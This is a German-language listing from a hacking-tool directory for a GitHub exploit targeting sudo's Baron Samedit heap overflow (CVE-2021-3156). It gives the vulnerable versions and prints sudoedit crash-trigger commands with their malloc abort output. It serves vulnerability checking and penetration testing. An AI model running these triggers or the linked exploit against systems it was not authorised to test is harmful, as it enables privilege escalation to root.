Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156 — Exploit für CVE-2021-3156 (Baron Samedit), ein heap-basierter Pufferüberlauf in sudo Versionen 1.8.2-1.8.31p2 und 1.9.0-1.9.5p1, der eine Privilegieneskalation zu root über sudoedit -s mit einem manipulierten Backslash-Argument ermöglicht. | Kitploit
Tools/GitHubGitHub/shuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsRed TeamingBinary-Exploitation
GitHubshuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156

Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156

Exploit für CVE-2021-3156 (Baron Samedit), ein heap-basierter Pufferüberlauf in sudo Versionen 1.8.2-1.8.31p2 und 1.9.0-1.9.5p1, der eine Privilegieneskalation zu root über sudoedit -s mit einem manipulierten Backslash-Argument ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156


Gegen die Schwachstelle anfällige Versionen

Die Baron-Samedit-Schwachstelle (CVE-2021-3156) betrifft die Legacy-Versionen von sudo 1.8.2 bis 1.8.31p2 und die stabilen Versionen 1.9.0 bis 1.9.5p1. Dieser Heap-basierte Pufferüberlauffehler wurde im Juli 2011 mit Commit 8255ed69 eingeführt und blieb fast ein Jahrzehnt unentdeckt.

Sudo vor 1.9.5p2 enthält einen Off-by-One-Fehler, der zu einem Heap-basierten Pufferüberlauf führen kann, was eine Privilegienausweitung auf Root über "sudoedit -s" und ein Kommandozeilenargument ermöglicht, das mit einem einzelnen Backslash endet.

Überprüfen der Schwachstelle mit Python-Befehl

root@kitploit:~
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
root@kitploit:~
malloc(): invalid size (unsorted)
Aborted

Überprüfen der Schwachstelle mit Python-Befehl

root@kitploit:~
sudoedit -s '\' `perl -e 'print "A" x 65536'`
root@kitploit:~
malloc(): corrupted top size
Aborted (core dumped)

Verwendung und Ergebnis in Ubuntu 20.04

root@kitploit:~
shuhaib@somebox:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

shuhaib@somebox:~$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted (core dumped)

shuhaib@somebox:~$ sudoedit -s '\' `perl -e 'print "A" x 65536'`
malloc(): corrupted top size
Aborted (core dumped)
Tool herunterladen